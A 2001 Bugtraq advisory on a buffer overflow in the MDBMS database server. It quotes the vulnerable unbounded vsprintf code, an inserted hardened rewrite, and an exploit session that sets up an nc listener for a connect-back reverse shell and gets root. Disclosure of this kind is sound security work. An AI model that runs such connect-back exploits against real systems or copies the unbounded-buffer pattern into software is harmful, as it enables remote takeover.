Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below contain an exploitable buffer overflow
in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, each line is appended to the end of the
previous ones. A subsequent call to the \s command causes the
overflow.
 
Below is faulty code (from interface.cc):
 
// Member function of class user in interface.cc.
#include <cstdarg>
#include <cstdio>
#include <cstring>
#include <cstdlib>
#include <sys/select.h>

void user::uprintf(char *s, ...)
{
  char b[10000];                 // fixed-size stack buffer
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap);  // <---- no length bound: formatted output longer than 10000 bytes overruns b
  va_end(ap);
  newlen=strlen(b);
  // the pending-output queue is grown as needed; only b is fixed
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,&parent->wmask);     // mark the socket as having output to write
}
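For contrast, a hardened form of the same appending routine, added here as an illustration and not taken from MDBMS or its fixed release (struct conn, uprintf_safe and demo_large_append are assumed names): the formatted length is measured with vsnprintf first and the heap output buffer grown to fit, so no fixed-size stack array is involved at all.

```c
/* Hardened stand-in for user::uprintf(): measure first, then write into
 * a buffer sized for the result. The FD_SET() wake-up is omitted. */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct conn {            /* hypothetical minimal connection state */
    char  *outbuf;       /* pending output, NUL-terminated (NULL until first use) */
    size_t outsize;      /* allocated size of outbuf */
};

/* Appends formatted text to c->outbuf; returns bytes appended or -1 on failure. */
int uprintf_safe(struct conn *c, const char *fmt, ...)
{
    va_list ap, ap2;
    va_start(ap, fmt);
    va_copy(ap2, ap);
    int need = vsnprintf(NULL, 0, fmt, ap);   /* measure only, writes nothing */
    va_end(ap);
    if (need < 0) { va_end(ap2); return -1; }
    size_t len = c->outbuf ? strlen(c->outbuf) : 0;
    size_t want = len + (size_t)need + 1;     /* +1 for the terminating NUL */
    if (want > c->outsize) {
        size_t grow = c->outsize;
        while (grow < want) grow += 1000;     /* same 1000-byte step as the original */
        char *p = realloc(c->outbuf, grow);
        if (!p) { va_end(ap2); return -1; }
        c->outbuf = p;
        c->outsize = grow;
    }
    /* Write straight into the sized heap buffer, bounded by the space left. */
    vsnprintf(c->outbuf + len, c->outsize - len, fmt, ap2);
    va_end(ap2);
    return need;
}

/* Feeds n constructed 'A' bytes (more than the original's 10000-byte stack
 * buffer when n is large), then a short line, and returns the output length. */
size_t demo_large_append(size_t n)
{
    struct conn c = { NULL, 0 };
    char *big = malloc(n + 1);
    memset(big, 'A', n); big[n] = '\0';
    uprintf_safe(&c, "%s", big);
    uprintf_safe(&c, "%s\n", "ok");
    size_t result = strlen(c.outbuf);
    free(big); free(c.outbuf);
    return result;
}
```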
 
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
 
Information about the overflows was sent to [EMAIL PROTECTED].
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for his kind response and quick update.
 
Exploit example:
----------------
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <[EMAIL PROTECTED]> - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
 
     -t <hostname>    : hostname to test
     -b <back>        : connect back to ip
     -p <port>        : port (default: 2223)
     -d <delay>       : delay before timeout
     -o <offset>      : offset
     -h               : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <[EMAIL PROTECTED]> - Copyright (c) 2001
 
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return  : 0x80cfe76 / using the heap ...
-> Sending payload: ...
 
-> * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
                 -- Elbert Hubbard

mdbms.tar.gz
